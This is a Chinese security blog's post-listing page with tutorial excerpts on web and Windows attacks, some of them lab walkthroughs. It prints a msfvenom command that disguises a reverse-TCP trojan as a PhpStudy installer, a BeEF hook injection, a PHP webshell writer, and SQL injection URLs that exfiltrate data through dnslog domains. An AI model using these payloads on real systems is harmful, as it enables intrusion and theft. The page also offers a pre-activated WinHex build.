- 博客(190)
- 资源 (4)
- 收藏
- 关注
RSS订阅
原创 中间件的解析漏洞详解及演示
解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。
2020-08-19 20:18:20
11687
22
原创 树莓派变身软路由——安装openwrt
最近闲来无事,手头刚好有限制的树莓派。由于安装kali,性能不足。安装原版树莓派镜像又不是刚需。所以奢侈了一会,刷了个openwrt镜像当软路由使用。前期准备:(需要的工具在文末) 树莓派3B+ 适用于树莓派的openwrt镜像 读卡器 一张32G以上的内存卡 格式化工具:SD card formatter 写入工具:win32diskimager具体步骤:下载o...
2020-03-31 18:11:58
14121
77
原创 windows 认证机制
文章目录Windows认证协议NTLM(NT LAN Manager)KerberosNTLM认证Windwos 密码hashNTLM hashNET-NTLM hash流程注意图解Kerberos认证名词解释流程注意图解利用方式NTLM的利用方式1、Pass the hash2、Pass the keyKerberos的利用方式Pass The Ticket 1(Golden Ticket)Pass The Ticket 2(Silver Ticket)黄金、白银票据的区别Windows认证协议Win
2020-10-24 21:20:05
3293
1
原创 OWASP TOP 10
转自行云博客https://www.xy586.top/121765.html文章目录OWASP Top 10A1 注入injectionA2 失效的身份认证A3 敏感数据泄露A4 外部实体(XXE)A5 失效的访问控制A6 安全配置错误A7 跨站脚本(xss)A8 不安全的反序列化A9 使用含有已知漏洞的组件A10 不足的日志记录和监控OWASP Top 10OWASP(开放式Web应用程序安全项目)的工具、文档、论坛和全球各地分会都是开放的,对所有致力于改进应用程序安全的人士开放,其最具权威.
2020-10-14 19:23:24
2844
1
原创 渗透测试面试问题合集
一、思路流程1、信息收集a、服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)b、网站指纹识别(包括,cms,cdn,证书等),dns记录c、whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)e、子域名收集,旁站,C段等f、google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等g、扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄漏等h、传输协议,通用漏洞,exp,github源码等2、漏洞挖掘a、浏览网站,看看
2020-10-11 23:52:09
9393
6
原创 网站克隆:setoolkit社工软件
本文转自行云博客https://www.xy586.topbeef-xss安装beef-xss:apt install beef-xss安装完成之后运行beef-xss:登录网址:http://192.168.232.138:3000/ui/authentication将beef-xss生成的js代码,放入网站中<script src="http://192.168.232.138:3000/hook.js"></script>被攻击目标打开网页链接,则beef.
2020-09-20 12:15:41
2395
原创 msf工具之木马程序制作以及伪装
本文转自行云博客https://www.xy586.top文章目录捆绑木马RAR自动解压捆绑木马使用msfvenom制作木马程序:#生成木马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe载(piao)时,会发现速度异常之慢!就我个人而言,在我家里200M电信宽带的环境下,就没发现速度大于过20KB/S的时候,这简直太难受了。今天分享一批提供在线加速下载的网站!http://toolwa.com/github/https://d.serctl.com/https://gh.api.99988866.xyz/ht.
2020-08-30 22:39:44
2493
原创 PHP反序列化漏洞原理及示例
本站转自行云博客https://www.xy586.top/文章目录PHP反序列化序列化与反序列化PHP魔法函数反序列化漏洞简介原理触发条件示例PHP反序列化序列化与反序列化序列化说通俗点就是把一个对象变成可以传输的字符串。序列化过程中还会对不同属性的变量进行不同方式的变化public的属性在序列化时,直接显示属性名protected的属性在序列化时,会在属性名前增加0x00*0x00,其长度会增加3private的属性在序列化时,会在属性名前增加0x00classname0x00.
2020-08-26 19:53:03
7620
9
原创 未授权访问漏洞原理及复现
本文转自行云博客https://www.xy586.top/文章目录未授权访问前提知识ssh免密登录客户端服务端安装Redis数据库Redis语法原理攻击复现利用计划任务执行命令反弹shell写ssh-keygen公钥然后使用私钥登陆往web物理路径写webshell防御方法未授权访问前提知识ssh免密登录客户端进入.ssh文件cd .ssh/生成公私钥ssh-keygen -t rsa上传公钥到服务端 ssh-copy-id user@ip更改.ssh目录跟私钥的权限chmod 7.
2020-08-25 19:00:55
5591
1
原创 XXE实体注入漏洞详解
本文转自行云博客https://www.xy586.top/文章目录什么是XXE原理XXE漏洞带来的的危害什么是 XML寻找XXEXXE的防御示例什么是XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。原理既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径,那么服务器在解析这个XML的时候.
2020-08-24 18:49:25
3736
原创 WinHex v20.0 绿色单文件版
软件介绍X-Ways WinHex,全球知名的计算机取证及数据恢复软件,十六进制编辑器和磁盘编辑器。这款专业十六进制编辑器,用于取证搜集、数据恢复、文件分析和编辑、底层数据处理和安全领域收集文件报告。使用它可以检查修复各种文件、硬盘及内存卡等损坏造成的数据丢失等问题,编辑修改Hex与ASCII编码,多文件搜索与替换,磁盘扇区 (支持FAT16、FAT32和NTFS)自动搜索编辑,文件比对和分析,RAM编辑工具等。软件截图版本特点 by Ponsonnet(v20.0)免激活,加入注册授权文件,解
2020-08-23 22:15:19
1315
1
原创 任意文件包含漏洞的绕过方式
本文转自行云博客https://www.xy586.top/文章目录前期准备长目录截断原理payload%00截断原理payload基于session机制传马条件:payload总结前期准备file.php代码<?php $a = $_GET['a']; include($a.'.html'); ?>hack.php代码<?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?&.
2020-08-23 16:54:17
3776
3
原创 任意文件包含漏洞原理解析及演示
本文转自行云博客https://www.xy586.top/文章目录原理分类PHP文件包含的函数伪协议演示php://input 伪协议data://text/plain 伪协议zip:// 伪协议原理文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源.
2020-08-20 18:42:25
10322
11
原创 基于JavaScript的rce反弹shell漏洞
本文转自行云博客https://www.xy586.top/文章目录环境要求工具地址攻击步骤环境要求kali攻击机192.168.232.131win10靶机192.168.232.140工具地址https://github.com/CroweCybersecurity/ps1encode攻击步骤拉取工具到kali的根目录下git clone https://github.com/CroweCybersecurity/ps1encode.git给权限chmod +x pslen.
2020-08-17 18:29:40
3325
原创 永恒之蓝漏洞原理及利用
本文转自行云博客https://www.xy586.top/文章目录摘要前提需要原理漏洞利用摘要什么是永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通.
2020-08-16 22:56:14
27672
8
原创 RCE(远程命令/代码执行漏洞)原理及复现
本文转自行云博客https://www.xy586.top/作用RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。原理远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果,设计者在完成该功能时,没有做严格.
2020-08-15 16:48:51
9348
2
原创 SSRF服务端请求伪造——原理及绕过姿势
转自行云博客原理SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。发生场景只要当前服务器有发送请.
2020-08-12 18:19:36
2656
原创 CSRF跨站请求伪造——原理及复现
转自行云博客https://www.xy586.top/原理CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性你这可以这么理解CSRF攻击:攻击者盗用了.
2020-08-11 18:16:01
3260
1
原创 《网络爬虫开发实战案例》笔记
转自行云博客https://www.xy586.top/爬虫基础1.HTTP基本原理URI和URLURI: 统一资源标志符URL: 统一资源定位符HTTP和HTTPSHTTP: 超文本传输协议,用于从网络传输超文本数据到本地浏览器的传输协议,它能够保证高效准确的传输文本文档HTTPS: 以安全为目标的HTTP通道,简单来讲是HTTP的安全版,即HTTP下加入SSL,所简称为HTTPSHTTPS的安全基础是SSL,因此通过它传输的内容都是经过SSL加密的,它的主要作用可以分为两种:.
2020-08-10 20:02:21
3716
2
原创 Python字符串常用内建函数
字符串常用内建函数序号方法及描述1capitalize() 将字符串的第一个字符转换为大写2center(width, fillchar) 返回一个指定的宽度 width 居中的字符串,fillchar 为填充的字符,默认为空格。3count(str, beg= 0,end=len(string)) 返回 str 在 string 里面出现的次数,如果 beg 或者 end 指定则返回指定范围内 str 出现的次数4bytes.decode(encoding=
2020-08-07 14:00:06
1338
原创 XSS原理详解
什么是XSS?CSS(Cross Site Scripting)—>>>XSS(跨站脚本攻击)目的:让受害者http客户端运行攻击者编写的恶意脚本。目标:前端脚本解析器,比如浏览器的javascript解析引擎、IE中的VBScript解析引擎。攻击的架构:BS架构(browser<–>(http)server)XSS有何危害?XSS能够产生的危害依赖于浏览器客户端脚本解析引擎的能力。技术上窃取凭证篡改DOM(篡改页面布局及内容)嵌入恶意的脚本代码发起
2020-08-03 18:03:53
1872
原创 SQL注入之dns回显注入
DNSlog外带数据注入用到的网站http://dnsbin.zhack.ca/http://dnslog.cn/http://ceye.io/pyload:查库http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",database(),".kkc53r.dnslog.cn\\xxx.txt")) --+查表http://192.168.232.128/sqllabs/Less-8/?id=1'
2020-08-03 18:01:06
2050
原创 SQL注入之宽字节注入
宽字节注入西欧字母符号,通过1个字节来表示。东亚字符通过至少两个字节来表示。GBK编码就是用两个字节来表示中文区字符的一个编码标准。GBK编码依然采用双字节编码方案,其编码范围:8140-FEFE(高字节从81到FE,低字节从40到FE),剔除xx7F码位,共23940个码位。条件后台使用GBK编码的时候,存在着看不见的ascii码转换为GBK编码的转换过程,可以使用宽字节注入。原理编码转换存在着单字符被合并的情形反斜杠对应url编码%5c,是单字节的。在%5c前再加入一个单字节字符%dd
2020-08-03 18:00:08
1378
原创 sql注入原理及危害
什么是SQLi前端构造的SQL语句片段拼接到后台SQL语句中,后台缺乏正确识别和过滤,造成与其外的数据库查询结果。SQLi的危害从技术上来说:未授权、非法增删改查数据库内容,包括窃取信息、删除数据库、读写系统文件、执行命令等等;从影响上来说:客户数据丢失、系统交易数据被篡改、网站首页被篡改。SQLi分类按照后台处理前端提交参数的类型来分,分两类:数字型注入和字符型注入。按照请求方式分:GET、POST按照其他分类方法,还有一些常见数据库注入类型:报错注入、盲注、延时注入、宽字节注入、二次
2020-08-03 14:35:35
3778
原创 HTML单页渐变背景响应式引导页源码
HTML单页渐变背景响应式引导页源码单页面的,自己网站比较多的,可以简单做个个人网址引导背景渐变,有点非主流,可自行修改背景 附件下载 文件名称:HTML单页渐变背景响应式引导页源码 更新日期:2020-05-23 文件大小:3.8K 提示:如遇问题或者链接失效请联系站长,欢迎捐赠本站以及广告合作! 点击下载 行云博客 - 免责申明 本站提供的一切软件、教程和内容信息仅限用于学习和研究目...
2020-08-03 10:58:42
1090
原创 自适应简约风格个人主页源码
文章目录[隐藏] 源码介绍源码截图 源码介绍一款有音乐,有花瓣飘落,有看板娘,还有轮播图,轮播图可以添加跳转链接,非常实用的个人介绍导航页面,大家需要的自行下载!源码截图 附件下载 文件名称:自适应简约风格个人主页源码 更新日期:2020-07-06 文件大小:341.2K 提示:如遇问题或者链接失效请联系站长,欢迎捐赠本站以及广告合作! 点击下载 行云博客 - 免责申明 本站提供的一...
2020-08-03 10:58:35
1814
原创 鸟哥的Linux私房菜 基础学习篇
文章目录[隐藏] 书籍介绍 书籍介绍这本书非常经典,至今仍然蝉联最受欢迎华语Linux书籍第一的位置,无人能撼动,非常基础,因为他本身也是从0基础开始自学摸索,所以这本书也是一个循序渐进的过程,带领大家一步步进入Linux世界,非常口语化,相较于那些用了大量专业词汇的技术书籍,鸟哥的书真的是更容易为人所接受。 附件下载 文件名称:鸟哥的Linux私房菜 基础学习篇 更新日期:2020-07-...
2020-08-03 10:58:34
634
原创 中国象棋AI在线对弈游戏源码
文章目录[隐藏] 源码介绍源码截图 源码介绍这是一款html5小游戏,主要功能在于js,带一套皮肤、内置ai算法,有能力的可以自行修改。源码截图 附件下载 文件名称:中国象棋AI在线对弈游戏源码 更新日期:2020-06-16 文件大小:1.5M 提示:如遇问题或者链接失效请联系站长,欢迎捐赠本站以及广告合作! 点击下载 查看演示 行云博客 - 免责申明 本站提供的一切软件、教程和内...
2020-08-03 10:58:33
2268
原创 高颜值早报生成器 瓦客早报
文章目录[隐藏] 软件介绍软件截图软件功能 软件介绍可能你在生活中想了解不同的类别资讯,也想分享给自己的同事或朋友们,但是自己一个个收集实属有点麻烦,那么瓦客早报生成器帮你解决这一切!软件截图软件功能支持Windows与MacOS。支持获取25+不同的资讯类别。支持一键复制。支持导出为图片。支持图片版DIY自己的LOGO。支持图片版背景图设置。支持获取实时天气。持久化配置,一劳永逸。支持每日一...
2020-08-03 10:58:28
917
原创 微信拍一拍小尾巴生成源码
文章目录[隐藏] 源码介绍源码截图 源码介绍输入想要的昵称和后缀,点击生成然后复制,返回微信粘贴替换微信群昵称。源码截图 附件下载 文件名称:微信拍一拍小尾巴生成源码 更新日期:2020-06-29 文件大小:81.54K 提示:如遇问题或者链接失效请联系站长,欢迎捐赠本站以及广告合作! 点击下载 查看演示 行云博客 - 免责申明 本站提供的一切软件、教程和内容信息仅限用于学习和研究...
2020-08-03 10:58:26
639
原创 微信群二维码活码生成源码
文章目录[隐藏] 源码介绍源码截图使用说明 源码介绍微信群二维码活码工具,生成微信群活码,随时可以切换二维码!微信官方群二维码有效期是7天,过期后无法扫码进群,或者是群人数满200人就无法扫码进群,如果我们在推广的时候,群满人或者过期了,别人还想进群,我们将会失去很多推广效果,所以有了群活码,可以在不更换链接和二维码的前提下,切换扫码后显示的内容,灵活变换!源码截图使用说明只需要修改MySql...
2020-08-03 10:58:26
2179
1
原创 天翼网盘在线直链解析源码
文章目录[隐藏] 源码介绍源码截图功能说明 源码介绍无需授权,伪静态文件齐全,丢在5.6~7.1环境就能用,需要安装SG11扩展,支持一键发布视频到苹果cms程序,一键提取图片外链地址,一键提取MP3音乐外链地址,一键提取MP4视频外链地址,批量复制各种文件外链地址,仿百度网盘分享文件,支持带密码方式分享。源码截图功能说明视频外链,上传视频到网盘,获取视频地址,可用于苹果cms程序播放视频;图...
2020-08-03 10:58:25
4065
1
原创 行云博客在线网页制作系统
还在为做网页而烦恼嘛?还在为没有技术而烦恼嘛?没关系,你现在遇到了我,这些都不是事!!!行云博客网页制作系统即刻上线,解决您的后顾之忧。本系统即日起免费使用,只需加群联系博主即可,赶紧行动起来吧!!!行云网页制作行云博客 - 免责申明 本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必...
2020-08-03 10:58:25
439
原创 Adobe Flash爆出严重漏洞:可导致代码任意执行 获取个人隐私
文章目录[隐藏] Adobe 被爆出的漏洞:受影响的产品版本升级修复版本其他漏洞受影响的产品版本升级修复版本 众所周知,Flash是网络攻击的首选目标。值得注意的是,Adobe在2017年7月宣布计划将Flash推入使用寿命终止状态,这意味着它将在今年年底不再更新或分发Flash Player。不过仍然在使用Adobe的用户需要警惕,因为Adobe 在今年5月被爆出了多个严重漏洞,好在Ado...
2020-08-03 10:58:25
732
原创 安卓逆向神器NP管理器v2.7.6
文章目录[隐藏] 软件介绍软件截图 软件介绍NP管理器是一款手机多功能的文件管理器,功能和MT管理器类似,都提供了反编译等安卓上逆向的功能。主要是对Apk、Dex、Jar、Smali、Pdf、视频和音频文件的简单应用,所有功能都是免费的。软件截图 附件下载 文件名称:安卓逆向神器NP管理器v2.7.6 更新日期:2020-06-18 文件大小:27.08M 提示:如遇问题或者链接失效请联系站...
2020-08-03 10:58:18
2504
原创 火绒安全v5.0.45 附单文件版
文章目录[隐藏] 软件介绍软件截图 软件介绍火绒是一款轻巧、高效、超强防御的安全防护软件。功能强悍,体量轻巧,既干净又安静。它能全面防御病毒、木马、流氓软件、流氓网站等对电脑系统和用户信息的威胁行为。火绒是国产安全软件中的一股清流,首先小巧流畅、不占内存,运行不卡,页面干净清爽,功能实用,自带火绒剑等扩展工具,无乱七八槽的东西;其次,自定义规则灵活,根据行为判断病毒木马,不用经常更新病毒库,不...
2020-08-03 10:58:18
1955
原创 乘风聚合图床源码 多接口
文章目录[隐藏] 源码介绍源码截图 源码介绍纯PHP源码无后台,有能力自己加后台,非常简约精美,11个接口,大部分都可以使用。代码全开源无加密!源码截图 附件下载 文件名称:乘风聚合图床源码 多接口 更新日期:2020-06-07 文件大小:19.9K 提示:如遇问题或者链接失效请联系站长,欢迎捐赠本站以及广告合作! 点击下载 查看演示 行云博客 - 免责申明 本站提供的一切软件、教...
2020-08-03 10:58:16
705
原创 本站旗下导航网正式启用
本站旗下导航网正式启用,免费收录各类网站,欢迎各位站长提交收录行云导航网行云博客 - 免责申明 本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与...
2020-08-03 10:58:13
492
cmd指令全集.txt
2020-07-08
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人